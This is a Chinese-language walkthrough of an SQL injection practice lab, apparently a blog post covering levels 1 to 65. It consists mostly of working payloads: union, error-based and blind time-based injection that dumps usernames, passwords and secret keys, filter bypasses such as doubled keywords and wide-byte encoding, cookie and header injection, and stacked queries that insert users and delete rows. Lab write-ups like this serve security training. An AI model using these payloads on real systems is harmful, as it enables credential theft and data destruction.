sql注入靶场1-65

第一关:

单引号闭合:在这里插入图片描述
order by 判断字段数,显示位2.3:在这里插入图片描述sql注入靶场1-65_第1张图片
输出数据库版本?id=-1' union select 1,2,version() --+sql注入靶场1-65_第2张图片
输出数据库名称:?id=-1' union select 1,2,database() --+在这里插入图片描述查看所有表名:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+sql注入靶场1-65_第3张图片
查看第一个字段:column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1 --+ :
sql注入靶场1-65_第4张图片
通过修改位置显示:sql注入靶场1-65_第5张图片
sql注入靶场1-65_第6张图片查看账户密码:
?id=-1' union select 1,username,password from users limit 1,1--+(可通过改变limit查看多个)sql注入靶场1-65_第7张图片
显示全部?id=-1' union select 1,2,group_concat('
','用户',username,'密码',password) from users--+
sql注入靶场1-65_第8张图片

第二关:

无闭合符:在这里插入图片描述
语句同第一关;

第三关:

')闭合在这里插入图片描述
语句同第一关;

第四关:

")闭合在这里插入图片描述
语句同第一关;

第五关:

'闭合在这里插入图片描述
从这一关开始盲注
判断数据库长度:?id=1' and length(database())='8' --+未报错代表是八位sql注入靶场1-65_第9张图片
也可使用 updatexml()函数
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+报错出数据库名称sql注入靶场1-65_第10张图片
查询表名:
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) --+sql注入靶场1-65_第11张图片
输出第二个字段名:?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x7e),1) --+(改变limit输出其他字段)sql注入靶场1-65_第12张图片输出出值:
?id=1' and updatexml(1,concat(0x7e,(select username from users limit 2,1),0x7e),1) --+sql注入靶场1-65_第13张图片
由于一次只能求出一个需要在修改查询内容查出密码:
?id=1' and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) --+
sql注入靶场1-65_第14张图片
通过修改limit可注入出其他;

第六关:

"闭合在这里插入图片描述
注入求值同第五关如下:
?id=1" and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) --+在这里插入图片描述

第七关:

'))闭合在这里插入图片描述
盲注:本关使用substr()函数
首先判断数据库字段数:
?id=1')) and length(database())='8'--+没有报错代表数据库位数为八sql注入靶场1-65_第15张图片使用折中的方法逐个判断出字符:
?id=1')) and substr((select database()),1,1)>'a'--+在这里插入图片描述折中?id=1')) and substr((select database()),1,1)>'n'--+sql注入靶场1-65_第16张图片折中?id=1')) and substr((select database()),1,1)>'u'--+错误说明比u小sql注入靶场1-65_第17张图片?id=1')) and substr((select database()),1,1)>'q'--+成功说明在q和u之间逐个测试sql注入靶场1-65_第18张图片?id=1')) and substr((select database()),1,1)>'r'--+失败不是下一个sql注入靶场1-65_第19张图片?id=1')) and substr((select database()),1,1)='s'--+无报错说明数据库第一个字符是ssql注入靶场1-65_第20张图片调节limit求出八位;
后分别使用:
?id=1'))and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)>'a'--+逐个求出表名;sql注入靶场1-65_第21张图片使用:
?id=1'))and substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1)>'a'--+逐个求出列名;sql注入靶场1-65_第22张图片使用:
?id=1'))and substr((select password from users limit 1,1),1,1)>'a'--+逐个查出值;sql注入靶场1-65_第23张图片

第八关:

'闭合在这里插入图片描述注入求值同第七关:

第九关:

'闭合:在这里插入图片描述这一关延时注入:
?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+sql注入靶场1-65_第24张图片若请求错误则会延迟五秒;
求出:表名?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,1,sleep(5))--+(注:e=101)sql注入靶场1-65_第25张图片使用该函数逐个折中判断;

第十关:

"闭合在这里插入图片描述本关同第九关:sql注入靶场1-65_第26张图片

第十一关:

万能密码:’ or 1=1 #sql注入靶场1-65_第27张图片sql注入靶场1-65_第28张图片

第十二关:

修改闭合方式
在这里插入图片描述sql注入靶场1-65_第29张图片

第十三关:

修改闭合方式在这里插入图片描述在这里插入图片描述

第十四关:

"闭合
在这里插入图片描述sql注入靶场1-65_第30张图片

第十五关:

'注释在这里插入图片描述
sql注入靶场1-65_第31张图片

第十六关:

")闭合
在这里插入图片描述sql注入靶场1-65_第32张图片

第十七关:

'闭合sql注入靶场1-65_第33张图片
burp抓包:
uname=admin&passwd=1962' and extractvalue(1,concat(0x7e,(select version()),0x7e))--+查询出本版信息sql注入靶场1-65_第34张图片在这个位置依次查询;

第十八关:

基于账户密码正确的情况下注入查询:(注:十七关重置过密码需要改回来)

观察代码uagent和ip被传入数据库可进行修改在这里插入图片描述
以此为注入点:
sql注入靶场1-65_第35张图片

第十九关:

观察代码referer和ip被传入数据库sql注入靶场1-65_第36张图片
burp抓包:将Referer:修改为'and extractvalue(1,concat(0x7e,(select version()),0x7e)) and '1'='1sql注入靶场1-65_第37张图片

第二十关:

cookie中的username值被带入数据库中:sql注入靶场1-65_第38张图片抓包将cookie修改为uname=' union select 1,2,database() or 1=1 #发现输出点在1,2上修改sql注入靶场1-65_第39张图片Cookie: uname=' union select 1,database(),3 or 1=1 #成功查询数据库名sql注入靶场1-65_第40张图片

第二十一关:

本关对cookie进行了base64sql注入靶场1-65_第41张图片
本关还需要admin登陆成功:sql注入靶场1-65_第42张图片
在这个页面刷新:burp抓包输入编码后的代码
admin'and extractvalue(1,concat(0x7e,(select database()),0x7e))and'1'='1编码:
YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSkpYW5kJzEnPScx

第二十二关:

"封装sql注入靶场1-65_第43张图片将上一关的代码改为双引号编码输出成功:sql注入靶场1-65_第44张图片

第二十三关:

这里屏蔽了#和–+;sql注入靶场1-65_第45张图片
使用’单引号闭合:?id=-1' union select 1,database(),'3查看数据库;sql注入靶场1-65_第46张图片查询所有表
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),'3sql注入靶场1-65_第47张图片

第二十四关:

修改密码处没有特殊字符过滤可通过在用户名后添加特殊字符;来修改管理员admin的密码sql注入靶场1-65_第48张图片

第二十五关:

or和and过滤:在这里插入图片描述双写这两个 :?id=1' oorrder by 1 anandd '1'='1:sql注入靶场1-65_第49张图片
查询注入点:?id=-1' union select 1,2,3 anandd '1'='1sql注入靶场1-65_第50张图片
查询数据库:?id=-1' union select 1,database(),3 anandd '1'='1sql注入靶场1-65_第51张图片
查询所有表:?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='database()' limit 0,1),3 anandd '1'='1sql注入靶场1-65_第52张图片查询字段:?id=-1' union select 1,(select column_name from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' limit 1,1),3 anandd '1'='1sql注入靶场1-65_第53张图片
挨个查询值:sql注入靶场1-65_第54张图片

第二十五a关:

本关不用闭合字符?id=1 aandnd 1=1sql注入靶场1-65_第55张图片查询数据库:?id=-1 union select 1,database(),3sql注入靶场1-65_第56张图片注:和25没什么差别代码相同只是去掉了’

第二十六关:

'闭合在这里插入图片描述过滤字符:。。。。。sql注入靶场1-65_第57张图片报错注入查看数据库:?id=1'||updatexml(1,concat(':',(select database())),1)||'1'='1在这里插入图片描述报错注入查看所有表:?id=1'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1sql注入靶场1-65_第58张图片查询全部字段:?id=1'||updatexml(1,concat('$',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())anandd(table_name='users'))),0)||'1'='1sql注入靶场1-65_第59张图片
查询前面一部分用户名:?id=1'||updatexml(1,concat('$',(select(group_concat(username))from(users))),0)||'1'='1sql注入靶场1-65_第60张图片一部分密码:?id=1'||updatexml(1,concat('$',(select(group_concat(passwoorrd))from(users))),0)||'1'='1sql注入靶场1-65_第61张图片

第二十六a关:

sql注入靶场1-65_第62张图片?id=1)'||updatexml(1,concat(':',(select database())),1)||('1')=('1

第二十七关:

过滤字符sql注入靶场1-65_第63张图片尝试大小写混合:
?id=1'||updatexml(1,concat(':',(select database())),1)||'1'='1sql注入靶场1-65_第64张图片查询全部表:?id=1'||updatexml(1,concat('$',(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),0)||'1'='1在这里插入图片描述查询所有字段名:?id=1'||updatexml(1,concat('$',(selEct(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='users'))),0)||'1'='1在这里插入图片描述一部分用户:?id=1'||updatexml(1,concat('$',(selEct(group_concat(username))from(users))),0)||'1'='1sql注入靶场1-65_第65张图片一部分用户密码:?id=1'||updatexml(1,concat(':',(sElect(group_concat(password))from(users))),0)||'1'='1sql注入靶场1-65_第66张图片

第二十七a关:

“闭合sql注入靶场1-65_第67张图片
查询数据库:?id=99"%0AUNIon%0ASELECt%0A1,database(),3||"1"="1(注:%0A是换行符)在这里插入图片描述本关和上一关区别不大只是’换成了”

第二十八关:

闭合字符’)在这里插入图片描述
屏蔽字符:sql注入靶场1-65_第68张图片联合查询:?id=10000000000000')ununion%0Aselection%0Aselect%0A1,database(),3||('1')=('1sql注入靶场1-65_第69张图片查询全部表:?id=10000000000000')ununion%0Aselection%0Aselect%0A1,(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()%0Alimit%0A0,1),3||('1')=('1sql注入靶场1-65_第70张图片查询全部字段:?id=10000000000000')ununion%0Aselection%0Aselect%0A1,(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema=database()%0Aand%0Atable_name='users'%0Alimit%0A0,1),3||('1')=('1sql注入靶场1-65_第71张图片查询用户:?id=10000000000000')ununion%0Aselection%0Aselect%0A1,(select%0Ausername%0Afrom%0Ausers%0Alimit%0A4,1),3||('1')=('1sql注入靶场1-65_第72张图片查询用户密码:?id=10000000000000')ununion%0Aselection%0Aselect%0A1,(select%0Apassword%0Afrom%0Ausers%0Alimit%0A4,1),3||('1')=('1在这里插入图片描述

第二十八a关:

降低了难度;
使用上一关的方法一样成功:

第二十九关:

'闭合在这里插入图片描述
查询数据库:?id=-1' union select 1,database(),3%23sql注入靶场1-65_第73张图片查询所有表:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23sql注入靶场1-65_第74张图片查询所有字段:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1%23sql注入靶场1-65_第75张图片查询用户,查询用户密码:?id=-1' union select 1,username,password from users limit 1,1%23sql注入靶场1-65_第76张图片

第三十关:

"闭合:sql注入靶场1-65_第77张图片查询用户,查询用户密码:?id=-1" union select 1,username,password from users limit 1,1%23sql注入靶场1-65_第78张图片

第三十一关:

")闭合:sql注入靶场1-65_第79张图片查询用户,查询用户密码:?id=-1") union select 1,username,password from users limit 1,1%23sql注入靶场1-65_第80张图片

第三十二关:

查询字段:?id=-1%df%27%20union%20select%201,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)%23sql注入靶场1-65_第81张图片本关使用宽字符:?id=-1%df%27%20union%20select%201,username,password%20from%20users%20limit%201,1%23sql注入靶场1-65_第82张图片

第三十三关:

使用宽字符:?id=-1%df%27%20union%20select%201,username,password%20from%20users%20limit%201,1%23sql注入靶场1-65_第83张图片

第三十四关:

使用�’or 1=1 #绕过:�’是’的utf-16编码的结果:密码随便在这里插入图片描述

第三十五关:

本关不需要闭合:?id=1 and 1=2
数据库名:?id=-1 union select 1,database(),3--+sql注入靶场1-65_第84张图片
全部的表:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+sql注入靶场1-65_第85张图片字段名:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)--+sql注入靶场1-65_第86张图片求值:?id=-1 union select 1,username,password from users limit 1,1 --+sql注入靶场1-65_第87张图片

第三十六关:

加宽字符过滤:?id=1%df' and 1=1 --+
数据库名:?id=-1%df' union select 1,database(),3 --+sql注入靶场1-65_第88张图片全部的表名:?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+sql注入靶场1-65_第89张图片全部的字段名:?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)--+sql注入靶场1-65_第90张图片用户名密码:?id=-1%df' union select 1,username,password from users limit 1,1 --+sql注入靶场1-65_第91张图片

第三十七关:

同三十四关使用�’or 1=1 #绕过:�’是’的utf-16编码的结果:密码随便:sql注入靶场1-65_第92张图片
�' union select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a#sql注入靶场1-65_第93张图片

第三十八关:

闭合字符:’sql注入靶场1-65_第94张图片
查看数据库名创建一个用户:?id=-1‘ union select 1,2,database();insert into users (username,password) values(1433223,741852)--+sql注入靶场1-65_第95张图片cmd查看一下;sql注入靶场1-65_第96张图片

第三十九关:

查看数据库名并创建一个用户:?id=-1 union select 1,2,database();insert into users (username,password) values(1433223,741852)–+sql注入靶场1-65_第97张图片sql注入靶场1-65_第98张图片

第四十关:

闭合字符:’)在这里插入图片描述查看数据库名并创建一个用户:?id=-1') union select 1,2,database();insert into users (username,password) values (65,'dfghjk'); #sql注入靶场1-65_第99张图片sql注入靶场1-65_第100张图片

第四十一关:

查看数据库名并创建一个用户:?id=-1 union select 1,2,database();insert into users (username,password) values (65,'dfghjk'); #在这里插入图片描述在这里插入图片描述

第四十二关:

密码栏输入';insert into users (username,password) values (65,'dfghjk'); #sql注入靶场1-65_第101张图片

sql注入靶场1-65_第102张图片

第四十三关:

只是闭合方式变成了’)
建的太多了删一删,密码输入框:');delete from users where id=14;#
成功删除:sql注入靶场1-65_第103张图片

第四十四关:

'闭合
用户名随便,在密码输入框:';delete from users where id=13;#sql注入靶场1-65_第104张图片sql注入靶场1-65_第105张图片

第四十五关:

')闭合
用户名随便,在密码输入框:');delete from users where id=13;#在这里插入图片描述

第四十六关:

查看代码发现:这里是sortsql注入靶场1-65_第106张图片
输入?sort=1看一哈sql注入靶场1-65_第107张图片
显错注入搞一哈:?sort=1 and(updatexml(1,concat(0x7e,(select database()),0x7e),0));成功木得问题sql注入靶场1-65_第108张图片查看所有表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0));sql注入靶场1-65_第109张图片
查看所有字段:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0));sql注入靶场1-65_第110张图片查询用户:?sort=1 and(updatexml(1,concat(0x7e,(select username from users limit 3,1),0x7e),0)); --+sql注入靶场1-65_第111张图片
查询用户密码:?sort=1 and(updatexml(1,concat(0x7e,(select password from users limit 3,1),0x7e),0)); --+sql注入靶场1-65_第112张图片

第四十七关:

'闭合
查看字段试试:?sort=1' and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)); --+sql注入靶场1-65_第113张图片
查询用户:?sort=1' and(updatexml(1,concat(0x7e,(select username from users limit 2,1),0x7e),0)); --+sql注入靶场1-65_第114张图片
查询用户密码:?sort=1' and(updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),0)); --+sql注入靶场1-65_第115张图片

第四十八关:

注入:?sort=1 and%20(If(ascii(substr(database(),1,1))=115,0,sleep(5)))sql注入靶场1-65_第116张图片

第四十九关:

'闭合:
注入:?sort=1' and (if(ascii(substr((select database()),1,1))=155,0,sleep(2))) --+
sql注入靶场1-65_第117张图片

第五十关:

可输入两个函数:?sort=1;delete from users where id=11;#删除id为11的sql注入靶场1-65_第118张图片

第五十一关:

'闭合:sql注入靶场1-65_第119张图片
可输入两个函数:?sort=1';delete from users where id=10;#删除id为10的sql注入靶场1-65_第120张图片

第五十二关:

同上在这里插入图片描述

第五十三关:

和之前的都差不多:?sort=1';insert into users (username,password) values (65275,'dfghjk');--+(添加一个用户)sql注入靶场1-65_第121张图片

第五十四关:

库:?id=-1' union select 1,2,database()--+sql注入靶场1-65_第122张图片
表:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+sql注入靶场1-65_第123张图片
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ut47q844sc'--+sql注入靶场1-65_第124张图片查看secret的值?id=-1' union select 1,2,group_concat(secret_4C3B) from ut47q844sc--+sql注入靶场1-65_第125张图片
将密钥填进去:sql注入靶场1-65_第126张图片

第五十五关:

)闭合:
sql注入靶场1-65_第127张图片
查询数据库名:?id=-1) union select 1,2,database()--+sql注入靶场1-65_第128张图片
查询表名:?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+sql注入靶场1-65_第129张图片
查询全部字段:?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='1h4r3ggcy2'--+sql注入靶场1-65_第130张图片
查询密钥:?id=-1) union select 1,2,group_concat(secret_9TU5) from 1h4r3ggcy2 --+sql注入靶场1-65_第131张图片
得到密钥填进去sql注入靶场1-65_第132张图片

第五十六关:

闭合’):
sql注入靶场1-65_第133张图片
查询数据库:?id=-1') union select 1,2,database()--+sql注入靶场1-65_第134张图片
查询全部的表:?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ sql注入靶场1-65_第135张图片查询全部字段名:?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='2vf0xkr6vf'--+ sql注入靶场1-65_第136张图片查询密钥:?id=-1') union select 1,2,group_concat(secret_WKRE) from 2vf0xkr6vf --+ sql注入靶场1-65_第137张图片密钥填入成功:sql注入靶场1-65_第138张图片

第五十七关:

"闭合:sql注入靶场1-65_第139张图片查询数据库名:?id=-1" union select 1,2,database()--+sql注入靶场1-65_第140张图片查询全部表名:?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ sql注入靶场1-65_第141张图片查询全部字段名:?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='2j1yd8ohht'--+ sql注入靶场1-65_第142张图片查询密钥:?id=-1" union select 1,2,group_concat(secret_VZA9) from 2j1yd8ohht--+ sql注入靶场1-65_第143张图片密钥提交:成功在这里插入图片描述

第五十八关:

'闭合:sql注入靶场1-65_第144张图片
使用报错注入:?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
sql注入靶场1-65_第145张图片查询表名:?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+sql注入靶场1-65_第146张图片
失误重新来
由于数据库不会改变直接查表;?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+新的表
sql注入靶场1-65_第147张图片
查字段:?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='5bojtnzndu'),0x7e),1) --+在这里插入图片描述密钥:?id=-1' and updatexml(1,concat(0x7e,(select group_concat(secret_LMI8) from 5bojtnzndu),0x7e),1) --+sql注入靶场1-65_第148张图片成功sql注入靶场1-65_第149张图片

第五十九关:

数据库:?id=-1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+sql注入靶场1-65_第150张图片查表名:?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+sql注入靶场1-65_第151张图片查字段名:?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='3cxr10elnb'),0x7e),1) --+sql注入靶场1-65_第152张图片查询密钥:?id=-1 and updatexml(1,concat(0x7e,(select group_concat(secret_X2LK) from 3cxr10elnb),0x7e),1) --+sql注入靶场1-65_第153张图片将密钥提交:sql注入靶场1-65_第154张图片

第六十关:

“)闭合:
查看数据库:?id=-1") and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+sql注入靶场1-65_第155张图片查看全部的表名:?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+sql注入靶场1-65_第156张图片查看全部的字段名:?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='i1r6zk4hg0'),0x7e),1) --+sql注入靶场1-65_第157张图片
密钥?id=-1”) and updatexml(1,concat(0x7e,(select group_concat(secret_7W87) from i1r6zk4hg0),0x7e),1) --+sql注入靶场1-65_第158张图片成功:sql注入靶场1-65_第159张图片

第六十一关:

闭合’)):sql注入靶场1-65_第160张图片查询数据库:?id=-1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+sql注入靶场1-65_第161张图片
查询表:?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+sql注入靶场1-65_第162张图片查询字段:?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='au8r4kpzmq'),0x7e),1) --+在这里插入图片描述查询密钥:?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(secret_28LC) from au8r4kpzmq),0x7e),1) --+sql注入靶场1-65_第163张图片成功:sql注入靶场1-65_第164张图片

第六十二关:

闭合方式:’)
这一关使用延时注入:查询数据库名;使用折中的方法?id=1') and if(ascii(substr((select database()),1,1))=19,1,sleep(5)) --+sql注入靶场1-65_第165张图片

第六十三关:

闭合方式:’
同样使用延时注入:?id=1' and if(ascii(substr((select database()),1,1))=19,1,sleep(5)) --+
sql注入靶场1-65_第166张图片

第六十四关:

双)):sql注入靶场1-65_第167张图片同样是延时注入:?id=1)) and if(ascii(substr((select database()),1,1))=99,1,sleep(5)) --+sql注入靶场1-65_第168张图片

第六十五关:

双"):
sql注入靶场1-65_第169张图片
延时注入:?id=1") and if(ascii(substr((select database()),1,1))=99,1,sleep(5)) --+

你可能感兴趣的:(sql注入靶场1-65)